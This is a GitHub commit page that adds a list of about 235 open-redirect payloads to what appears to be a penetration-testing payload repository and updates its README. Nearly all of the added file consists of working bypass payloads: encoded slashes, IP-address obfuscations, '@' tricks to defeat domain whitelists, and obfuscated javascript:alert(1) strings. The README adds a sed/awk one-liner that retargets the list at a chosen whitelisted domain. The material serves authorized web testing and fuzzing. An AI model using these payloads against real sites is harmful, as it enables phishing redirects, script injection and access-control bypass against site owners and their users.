Skip to content

Commit

Permalink
Open Redirect Payloads updated
Browse files Browse the repository at this point in the history
  • Loading branch information
Swissky committed Jul 6, 2017
1 parent 6070ece commit c4b49fa
Show file tree
Hide file tree
Showing 2 changed files with 248 additions and 4 deletions.
235 changes: 235 additions & 0 deletions Open redirect/Open-Redirect-payloads.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,235 @@
//google.com/%2f..
//[email protected]/%2f..
///google.com/%2f..
///[email protected]/%2f..
////google.com/%2f..
////[email protected]/%2f..
https://google.com/%2f..
https://[email protected]/%2f..
/https://google.com/%2f..
/https://[email protected]/%2f..
//www.google.com/%2f%2e%2e
//[email protected]/%2f%2e%2e
///www.google.com/%2f%2e%2e
///[email protected]/%2f%2e%2e
////www.google.com/%2f%2e%2e
////[email protected]/%2f%2e%2e
https://www.google.com/%2f%2e%2e
https://[email protected]/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
/https://[email protected]/%2f%2e%2e
//google.com/
//[email protected]/
///google.com/
///[email protected]/
////google.com/
////[email protected]/
https://google.com/
https://[email protected]/
/https://google.com/
/https://[email protected]/
//google.com//
//[email protected]//
///google.com//
///[email protected]//
////google.com//
////[email protected]//
https://google.com//
https://[email protected]//
//https://google.com//
//https://[email protected]//
//www.google.com/%2e%2e%2f
//[email protected]/%2e%2e%2f
///www.google.com/%2e%2e%2f
///[email protected]/%2e%2e%2f
////www.google.com/%2e%2e%2f
////[email protected]/%2e%2e%2f
https://www.google.com/%2e%2e%2f
https://[email protected]/%2e%2e%2f
//https://www.google.com/%2e%2e%2f
//https://[email protected]/%2e%2e%2f
///www.google.com/%2e%2e
///[email protected]/%2e%2e
////www.google.com/%2e%2e
////[email protected]/%2e%2e
https:///www.google.com/%2e%2e
https:///[email protected]/%2e%2e
//https:///www.google.com/%2e%2e
//www.whitelisteddomain.tld@https:///www.google.com/%2e%2e
/https://www.google.com/%2e%2e
/https://[email protected]/%2e%2e
///www.google.com/%2f%2e%2e
///[email protected]/%2f%2e%2e
////www.google.com/%2f%2e%2e
////[email protected]/%2f%2e%2e
https:///www.google.com/%2f%2e%2e
https:///[email protected]/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
/https://[email protected]/%2f%2e%2e
/https:///www.google.com/%2f%2e%2e
/https:///[email protected]/%2f%2e%2e
/%09/google.com
/%09/[email protected]
//%09/google.com
//%09/[email protected]
///%09/google.com
///%09/[email protected]
////%09/google.com
////%09/[email protected]
https://%09/google.com
https://%09/[email protected]
/%5cgoogle.com
/%[email protected]
//%5cgoogle.com
//%[email protected]
///%5cgoogle.com
///%[email protected]
////%5cgoogle.com
////%[email protected]
https://%5cgoogle.com
https://%[email protected]
/https://%5cgoogle.com
/https://%[email protected]
https://google.com
https://[email protected]
javascript:alert(1);
javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
//google.com
https:google.com
//google%E3%80%82com
\/\/google.com/
/\/google.com/
//google%00.com
https://www.whitelisteddomain.tld/https://www.google.com/
";alert(0);//
javascript://www.whitelisteddomain.tld?%a0alert%281%29
http://0xd8.0x3a.0xd6.0xce
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://0xd83ad6ce
http://www.whitelisteddomain.tld@0xd83ad6ce
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http://XY>.7d8T\205pZM@0xd83ad6ce
http://3627734734
http://www.whitelisteddomain.tld@3627734734
http://3H6k7lIAiqjfNeN@3627734734
http://XY>.7d8T\205pZM@3627734734
http://472.314.470.462
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://0330.072.0326.0316
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://00330.00072.0000326.00000316
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://[::216.58.214.206]
http://www.whitelisteddomain.tld@[::216.58.214.206]
http://3H6k7lIAiqjfNeN@[::216.58.214.206]
http://XY>.7d8T\205pZM@[::216.58.214.206]
http://[::ffff:216.58.214.206]
http://www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http://XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http://0xd8.072.54990
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://0xd8.3856078
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://00330.3856078
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http://00330.0x3a.54990
http://[email protected]
http://[email protected]
http://XY>.7d8T\[email protected]
http:0xd8.0x3a.0xd6.0xce
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:0xd83ad6ce
http:www.whitelisteddomain.tld@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http:3627734734
http:www.whitelisteddomain.tld@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http:XY>.7d8T\205pZM@3627734734
http:472.314.470.462
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:0330.072.0326.0316
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:00330.00072.0000326.00000316
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:[::216.58.214.206]
http:www.whitelisteddomain.tld@[::216.58.214.206]
http:3H6k7lIAiqjfNeN@[::216.58.214.206]
http:XY>.7d8T\205pZM@[::216.58.214.206]
http:[::ffff:216.58.214.206]
http:www.whitelisteddomain.tld@[::ffff:216.58.214.206]
http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206]
http:XY>.7d8T\205pZM@[::ffff:216.58.214.206]
http:0xd8.072.54990
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:0xd8.3856078
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:00330.3856078
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
http:00330.0x3a.54990
http:[email protected]
http:[email protected]
http:XY>.7d8T\[email protected]
〱google.com
〵google.com
ゝgoogle.com
ーgoogle.com
ーgoogle.com
/〱google.com
/〵google.com
/ゝgoogle.com
/ーgoogle.com
/ーgoogle.com
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
<>javascript:alert(1);
<>//google.com
//google.com\@www.whitelisteddomain.tld
https://:@google.com\@www.whitelisteddomain.tld
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
ja\nva\tscript\r:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
http://google.com:80#@www.whitelisteddomain.tld/
http://google.com:[email protected]/
17 changes: 13 additions & 4 deletions Open redirect/README.md
View file
Original file line number Diff line number Diff line change
@@ -1,7 +1,15 @@
# Open URL Redirection
Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.
Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.

## Exploits
## Fuzzing
Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case

To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your test case URL.
```
WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
```

## Exploitation

Using CRLF to bypass "javascript" blacklisted keyword
```
Expand All @@ -21,7 +29,7 @@ https:google.com
Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //)
```
\/\/google.com/
/\/google.com/
/\/google.com/
```


Expand Down Expand Up @@ -66,4 +74,5 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)

## Thanks to
* filedescriptor
* https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
* https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)

0 comments on commit c4b49fa

Please sign in to comment.